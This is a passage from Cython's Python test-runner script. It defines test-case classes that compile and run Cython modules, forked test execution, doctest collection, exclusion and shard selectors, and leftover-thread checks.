self.cython_only = cython_only
self.test_selector = test_selector
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in (
'warning_errors',
'clear_to_none',
'error_on_unknown_names',
'error_on_uninitialized',
# 'cache_builtins', # not currently supported due to incorrect global caching
)
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
copy = os.symlink if CAN_SYMLINK else shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
ext_compile_defines = CDEFS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
define_macros=ext_compile_defines,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if so_path and not stderr:
# normal success case => ignore non-error compiler output
stdout = None
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
if self.test_selector:
filter_test_suite(tests, self.test_selector)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
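# Run a test function, forking first on Python 2 (when os.fork is available) so the
# freshly imported extension module does not stay loaded in the main process; the
# child's results are pickled to a temp file and merged back into `result`.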
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
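# Added note (not in the original source): the fork protocol above follows the
# standard os.fork()/os.waitpid() convention -- the low byte of the waitpid()
# status is the signal that killed the child (0 if none) and the high byte is
# the child's exit code, which here is 0 when the tests ran (their failures, if
# any, were pickled to result_file) and 1 when an exception escaped the run.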
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
if self.test_selector:
filter_test_suite(tests, self.test_selector)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file = os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
excludelist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in excludelist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None, capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + self.workdir + os.pathsep + old_path
env['PYTHONPATH'] = new_path
if not env.get("PYTHONIOENCODING"):
env["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res == 0 and b'REFNANNY: ' in _out:
res = -1
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = os.path.abspath(os.path.join('..', '..', 'cython.py'))
try:
subprocess.check_output([
"make",
"PYTHON='%s'" % sys.executable,
"CYTHON='%s'" % cython,
"LIBDIR1='%s'" % libdir,
"paths", "test",
])
except subprocess.CalledProcessError as err:
print(err.output.decode())
raise
self.assertTrue(True) # :)
def load_listfile(filename):
    # just re-use the FileListExcluder implementation
fle = FileListExcluder(filename)
return list(fle.excludes)
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, module_name in deps.items():
try:
module = __import__(module_name)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
print("Test dependency not found: '%s'" % module_name)
else:
version = self.find_dep_version(module_name, module)
print("Test dependency found: '%s' version %s" % (module_name, version))
self.tests_missing_deps = []
def find_dep_version(self, name, module):
try:
version = module.__version__
except AttributeError:
stdlib_dir = os.path.dirname(shutil.__file__) + os.sep
module_path = getattr(module, '__file__', stdlib_dir) # no __file__? => builtin stdlib module
if module_path.startswith(stdlib_dir):
# stdlib module
version = sys.version.partition(' ')[0]
elif '.' in name:
# incrementally look for a parent package with version
name = name.rpartition('.')[0]
return self.find_dep_version(name, __import__(name))
else:
version = '?.?'
return version
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = any(string_selector(ex)(testname) for ex in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
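# Added note (not in the original source): string_selector() is how command-line
# test selectors are interpreted -- a pattern with a colon such as 'ticket:123'
# becomes TagsSelector('ticket', '123') and matches on test tags, while anything
# else (e.g. 'bugs') is treated as a case-insensitive regex on the test name.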
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
    # deterministic partition of the tests, which is important.
# Random seed to improve the hash distribution.
_seed = base64.b64decode(b'2ged1EtsGz/GkisJr22UcLeP6n9XIaA5Vby2wM49Wvg=')
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(self._seed + testname) & 0x7fffffff if _is_py2 else _hash(self._seed + testname.encode())
return hashval % self.shard_count != self.shard_num
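# Added note: for a given shard_count N, the selectors ShardExcludeSelector(0, N)
# .. ShardExcludeSelector(N-1, N) exclude complementary subsets, so each test
# name is kept by exactly one shard, and the partition is stable across worker
# processes (plain hash() would not be, because of per-process hash seeds).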
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
